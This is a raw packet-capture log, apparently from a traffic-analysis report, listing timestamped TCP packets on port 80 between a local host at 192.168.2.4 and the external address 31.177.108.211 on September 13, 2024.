                                          Sep 13, 2024 21:02:33.604758978 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:33.660262108 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:33.738260984 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:33.953883886 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:33.953955889 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:36.058805943 CEST5667480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:36.058917046 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:36.064429045 CEST805667431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:36.064510107 CEST5667480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:36.064646959 CEST5667480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:36.064675093 CEST805667331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:36.064728022 CEST5667380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:36.072550058 CEST805667431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:36.410722017 CEST5667480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:36.415683985 CEST805667431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:36.415887117 CEST805667431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:36.800841093 CEST805667431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:36.935208082 CEST805667431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:36.935795069 CEST5667480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:38.223090887 CEST5667480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:38.223378897 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:38.228545904 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:38.228616953 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:38.228748083 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:38.228981972 CEST805667431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:38.229042053 CEST5667480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:38.233686924 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:38.582024097 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:38.587136030 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:38.587287903 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:38.587332010 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:38.993311882 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:39.035082102 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:39.247961044 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:39.248002052 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:39.248255968 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:39.518965960 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:39.519072056 CEST5667680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:39.524231911 CEST805667531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:39.524744987 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:39.524812937 CEST5667580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:39.524843931 CEST5667680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:39.677284956 CEST5667680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:39.682229042 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:40.087510109 CEST5667680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:40.095597029 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:40.095640898 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:40.095669031 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:40.313257933 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:40.444818974 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:40.444895983 CEST5667680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:40.996440887 CEST5667680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:40.996908903 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.002518892 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.002561092 CEST805667631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.002650023 CEST5667680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.002687931 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.002789021 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.010602951 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.348377943 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.353339911 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.353379011 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.353410006 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.745639086 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.831988096 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.893546104 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.942348003 CEST5667880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.947331905 CEST805667831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:41.947437048 CEST5667880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.947532892 CEST5667880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:41.952399015 CEST805667831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.030452967 CEST5668080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:42.035104990 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:42.035362959 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.035429001 CEST5668080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:42.111809969 CEST5668080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:42.117193937 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.300791979 CEST5667880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:42.306130886 CEST805667831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.306163073 CEST805667831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.457072020 CEST5668080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:42.462114096 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.462651968 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.462680101 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.699815989 CEST805667831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.765607119 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.830252886 CEST805667831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.830327034 CEST5667880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:42.919722080 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:42.919816017 CEST5668080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.630108118 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.630202055 CEST5667880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.630234957 CEST5668080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.630763054 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.635426998 CEST805667731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:43.635499001 CEST5667780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.635638952 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:43.635713100 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.635725975 CEST805667831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:43.635781050 CEST5667880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.635885000 CEST805668031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:43.635905027 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.635931015 CEST5668080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.640760899 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:43.988373041 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:43.993383884 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:43.993432999 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:43.993462086 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:44.372663975 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:44.472599983 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:44.525691032 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:44.660105944 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:45.133318901 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:45.133676052 CEST5668380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:45.139884949 CEST805668131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:45.139924049 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:45.139961958 CEST5668180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:45.140006065 CEST5668380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:45.140120029 CEST5668380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:45.146004915 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:45.488323927 CEST5668380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:45.493376970 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:45.493411064 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:45.493438005 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:45.874775887 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:46.010775089 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:46.010848045 CEST5668380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:46.783410072 CEST5668380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:46.783762932 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:46.788642883 CEST805668331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:46.788707018 CEST5668380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:46.788738012 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:46.788816929 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:46.788984060 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:46.793838024 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.144715071 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.328366041 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.328874111 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.329211950 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.754014015 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.754252911 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.754405022 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.832813978 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.837673903 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:47.838205099 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.838259935 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:47.843338966 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.191454887 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:48.197088003 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.197869062 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.591243029 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.733670950 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:48.733756065 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.174717903 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.175230980 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.176461935 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.180253029 CEST805668531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.180325985 CEST5668580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.180430889 CEST805668431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.180603981 CEST5668480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.181322098 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.181404114 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.181514978 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.186378956 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.535268068 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:49.540303946 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.540381908 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.540505886 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:49.943908930 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.035171032 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.102324009 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.235049963 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.322495937 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.322762012 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.327660084 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.328046083 CEST805668631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.328119040 CEST5668680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.328141928 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.328262091 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.333326101 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.675854921 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:50.828222990 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.828249931 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:50.828320980 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.100763083 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.160144091 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.253108978 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.457053900 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.947653055 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.947930098 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.952518940 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.952795982 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.952894926 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.953161955 CEST805668731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:51.953273058 CEST5668780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:51.957679033 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.300848961 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.305879116 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.305941105 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.305969000 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.334920883 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.340194941 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.340377092 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.340390921 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.341507912 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.345479965 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.396083117 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.451704979 CEST805668831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.452939034 CEST5668880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.522092104 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.529330969 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.531651020 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.531744003 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.539017916 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.691551924 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.698717117 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698839903 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698853970 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698896885 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.698976994 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.698990107 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699001074 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699021101 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699040890 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699168921 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699182034 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699193001 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699223042 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699234962 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.699441910 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.699482918 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.705302954 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705316067 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705327988 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705339909 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705352068 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705363035 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.705367088 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.705396891 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.705416918 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.745944023 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.749012947 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.799969912 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.800139904 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.845072985 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.848846912 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854127884 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854156017 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854182959 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854208946 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854213953 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854231119 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854234934 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854258060 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854262114 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854285955 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854289055 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854304075 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854315042 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854330063 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854356050 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854362965 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854389906 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854415894 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854435921 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854443073 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854461908 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854469061 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854485989 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854496002 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854513884 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854521990 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854542017 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.854548931 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854597092 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854623079 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854649067 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854674101 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854700089 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854747057 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854773045 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854823112 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854855061 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854882002 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854907990 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854933977 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.854965925 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.859949112 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.859976053 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860002041 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860033035 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860101938 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860142946 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860193968 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860219955 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860266924 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860292912 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860323906 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860351086 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860416889 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860443115 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.860469103 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.878978968 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:52.883826971 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.883897066 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:52.883924007 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.101778984 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.238271952 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.433398962 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.535150051 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.560600042 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.691864967 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.692433119 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.697487116 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.697566032 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.697665930 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.697696924 CEST805669031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:53.697745085 CEST5669080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:53.703824997 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.047341108 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.128917933 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.232031107 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.232038975 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.237004995 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.237128019 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.237287998 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.237318039 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.450277090 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.471155882 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.471303940 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.476547003 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.477305889 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.584763050 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.584965944 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.709141970 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.709676027 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.714539051 CEST805669131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.714606047 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.714617968 CEST5669180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.714677095 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.714803934 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:54.720433950 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:54.907582998 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.066536903 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.072614908 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.072649956 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.073213100 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.129013062 CEST5668980192.168.2.431.177.108.211
